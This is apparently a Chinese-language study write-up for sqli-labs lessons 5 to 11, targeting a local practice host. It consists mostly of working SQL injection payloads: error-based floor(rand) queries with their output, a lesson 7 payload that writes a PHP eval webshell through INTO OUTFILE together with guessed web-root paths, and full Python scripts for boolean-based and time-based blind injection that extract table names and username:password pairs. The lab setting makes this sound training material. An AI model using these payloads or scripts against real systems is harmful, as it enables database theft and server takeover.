5&6 子查询注入
有mysql的错误显示
本质是floor(rand)函数与group组合情况下的报错
参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html
payload1:查询库名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'
payload2:查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1242 (21000): Subquery returns more than 1 row
这里提示说结果子查询超出一行,确认问题是处在这里
payload3:用limit一个一个查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key'
payload4:查询列名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key'
payload:查询内容
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'
6与5差别在单引号和双引号payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+
7 利用文件写入一句话木马
首先吐槽一下这里的闭合方式,试了半天没办法看代码才知道,两个括号。。。
这一题需要用sql语句来进行文件操作。
需要用到函数select 'xxx' into outfile 'xxx';
用到这个的时候需要文件的绝对地址,而我们只能凭借经验来猜测。
根据系统和数据库猜测,如winserver的iis默认路径是c:/inetpub/wwwroot/,这好像说偏了,这是asp的,但知道也好
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocspayload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+
8 布尔盲注
就是相比第五题关闭了报错显示
分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1
无报错,根据是否返回you are in...来判断sql执行结果
那么找到可以执行的语句
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200);
Empty set (0.00 sec)
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
附上脚本
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
if ("You are in..." in rsp.text):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-8/"
databasename=""
tablename=""
t1=time.time()
payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'
databasename=bp(databasename,payload1)
payload2 ="?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{})%23"
tablename=bp(tablename,payload2)
t2=time.time()
print("总共时长为:")
print(t2-t1)
print(databasename+"\n"+tablename)
#下面是第二个脚本
import requests
from tqdm import tqdm
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
if ("You are in..." in rsp.text):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-8/"
usernamepassword=""
payload3 ="?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20'<br>')%20from%20users),{},1))>{})%23"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
9 时间盲注
看一下源码,不论sql查询语句的结果是否为空都返回you are in...
想办法构造一下payload,测试成功:?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
# print()
t1=time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2=time.time()
if (t2-t1>5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
databasename =''
tablename =''
url="http://sql.test/Less-9/"
# payload1 = '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
# databasename=bp(databasename,payload1)
databasename='security'
payload2 ="?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+"
tablename=bp(tablename,payload2)
#下面是求字段的脚本
#这里的payload写了好久,太长了容易看错,需要仔细一点
import requests
import time
from tqdm import tqdm
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
t1 = time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2 = time.time()
if (t2 - t1 > 5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
url="http://sql.test/Less-9/"
usernamepassword=""
# payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
10
相比于第九题将单引号改成了双引号
import requests
from tqdm import tqdm
import time
def bp(name,payload):
for j in tqdm(range(1, 200)):
min = 33
max = 127
while abs(min - max) > 1: # s
mid = int((min + max) * 0.5)
payloadd = payload.format(str(j), str(mid))
# print()
t1=time.time()
rsp = requests.get(url=url + payloadd)
rsp.encoding = 'utf-8'
t2=time.time()
if (t2-t1>5):
min = mid
else:
max = mid
# print(str(min)+"-"+str(max))
name += chr(max)
print(name)
if(name[-1:]==name[-2:-1]):
break
return name
databasename =''
tablename =''
url="http://sql.test/Less-10/"
payload1 ='?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
databasename=bp(databasename,payload1)
databasename='security'
payload2 ='?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+'
tablename=bp(tablename,payload2)
#下面是求字段的脚本
# import requests
# import time
# from tqdm import tqdm
#
# def bp(name,payload):
# for j in tqdm(range(1, 200)):
# min = 33
# max = 127
# while abs(min - max) > 1: # s
# mid = int((min + max) * 0.5)
# payloadd = payload.format(str(j), str(mid))
# t1 = time.time()
# rsp = requests.get(url=url + payloadd)
# rsp.encoding = 'utf-8'
# t2 = time.time()
# if (t2 - t1 > 5):
# min = mid
# else:
# max = mid
# # print(str(min)+"-"+str(max))
# name += chr(max)
# print(name)
# if(name[-1:]==name[-2:-1]):
# break
# return name
#
# url="http://sql.test/Less-9/"
# usernamepassword=""
# # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
# payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+'
# usernamepassword=bp(usernamepassword,payload3)
# print(usernamepassword)
11 报错注入
非标准解法